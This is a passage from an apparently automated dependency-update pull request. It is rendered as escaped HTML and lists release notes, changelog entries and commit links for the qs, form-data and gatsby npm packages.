\u003ccode\u003eutils.combine\u003c/code\u003e more\u003c/li\u003e\n\u003cli\u003e[patch] \u003ccode\u003eparse\u003c/code\u003e: add explicit \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e default\u003c/li\u003e\n\u003cli\u003e[actions] use shared action; re-add finishers\u003c/li\u003e\n\u003cli\u003e[meta] Fix changelog formatting bug\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003eside-channel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003ehas-bigints\u003c/code\u003e, \u003ccode\u003ehas-proto\u003c/code\u003e, \u003ccode\u003ehas-symbols\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.3\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003e[Fix] fix regressions from robustness refactor\n[actions] update reusable workflows\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: avoid a crash when a \u003ccode\u003efilter\u003c/code\u003e key is \u003ccode\u003enull\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eutils.merge\u003c/code\u003e: functions should not be stringified into keys\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: avoid a crash with interpretNumericEntities: true, comma: true, and iso charset\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: ensure a non-string \u003ccode\u003efilter\u003c/code\u003e does not crash\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003e__proto__\u003c/code\u003e syntax instead of \u003ccode\u003eObject.create\u003c/code\u003e for null objects\u003c/li\u003e\n\u003cli\u003e[Refactor] misc cleanup\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/bdcf0c7f82387c18ac8fabfccd2f440645cef47b\"\u003e\u003ccode\u003ebdcf0c7\u003c/code\u003e\u003c/a\u003e v6.14.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/294db90c812ddbe7d7a35d5687c505fd21a2d6a2\"\u003e\u003ccode\u003e294db90\u003c/code\u003e\u003c/a\u003e [readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5c308e5516c270a78caa6f278465914090f91ec6\"\u003e\u003ccode\u003e5c308e5\u003c/code\u003e\u003c/a\u003e [readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/6addf8cf738d529c54d91f6f3ffb6c1be91bbfdc\"\u003e\u003ccode\u003e6addf8c\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/cfc108f662326d6ab540f3545ef0b832baf83cdf\"\u003e\u003ccode\u003ecfc108f\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/`pars...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/febb64442a80e49200211fa38d3c96b58024ac77\"\u003e\u003ccode\u003efebb644\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when `thr...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482\"\u003e\u003ccode\u003ef6a7abf\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/fbc5206c25b4d1851cea683f02c10756c521d15a\"\u003e\u003ccode\u003efbc5206\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/1b9a8b4e78c6aff4c22fa559107227f02fd0216a\"\u003e\u003ccode\u003e1b9a8b4\u003c/code\u003e\u003c/a\u003e [actions] fix rebase workflow permissions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/2a35775614e0fb46ac8a3060201a32a7c23a7fda\"\u003e\u003ccode\u003e2a35775\u003c/code\u003e\u003c/a\u003e [meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.11.1...v6.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `form-data` from 4.0.0 to 4.0.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/releases\"\u003eform-data's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/blob/master/CHANGELOG.md\"\u003eform-data's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMerge tags v2.5.3 and v3.0.3 \u003ca href=\"https://github.com/form-data/form-data/commit/92613b9208556eb4ebc482fdf599fae111626fb6\"\u003e\u003ccode\u003e92613b9\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] migrate from travis to GHA \u003ca href=\"https://github.com/form-data/form-data/commit/806eda77740e6e3c67c7815afb216f2e1f187ba5\"\u003e\u003ccode\u003e806eda7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] migrate from travis to GHA \u003ca href=\"https://github.com/form-data/form-data/commit/8fdb3bc6b5d001f8909a9fca391d1d1d97ef1d79\"\u003e\u003ccode\u003e8fdb3bc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/41996f5ac73a867046d48512cab62e64fc846dad\"\u003e\u003ccode\u003e41996f5\u003c/code\u003e\u003c/a\u003e v4.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e [meta] actually ensure the readme backup isn’t published\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e [meta] fix readme capitalization\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e [meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e [Tests] fix linting errors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e [Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e [Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/d8d67dc8ac79285154edf7d3f57dbab593b9a146\"\u003e\u003ccode\u003ed8d67dc\u003c/code\u003e\u003c/a\u003e v4.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e [meta] remove local commit hooks\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.0...v4.0.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ljharb\"\u003eljharb\u003c/a\u003e, a new releaser for form-data since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gatsby` from 4.23.1 to 4.25.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/gatsbyjs/gatsby/releases\"\u003egatsby's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003egatsby-source-wordpress@7.13.5 and 6 more...\u003c/h2\u003e\n\u003cp\u003e2024-08-26\u003c/p\u003e\n\u003ch2\u003eUpdated packages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003egatsby-source-wordpress@7.13.5\u003c/li\u003e\n\u003cli\u003egatsby-remark-responsive-iframe@6.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-prismjs@7.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-images@7.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-images@6.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-graphviz@5.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-copy-linked-files@6.13.2\u003c/li\u003e\n\u003cli\u003egatsby-plugin-offline@6.13.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's 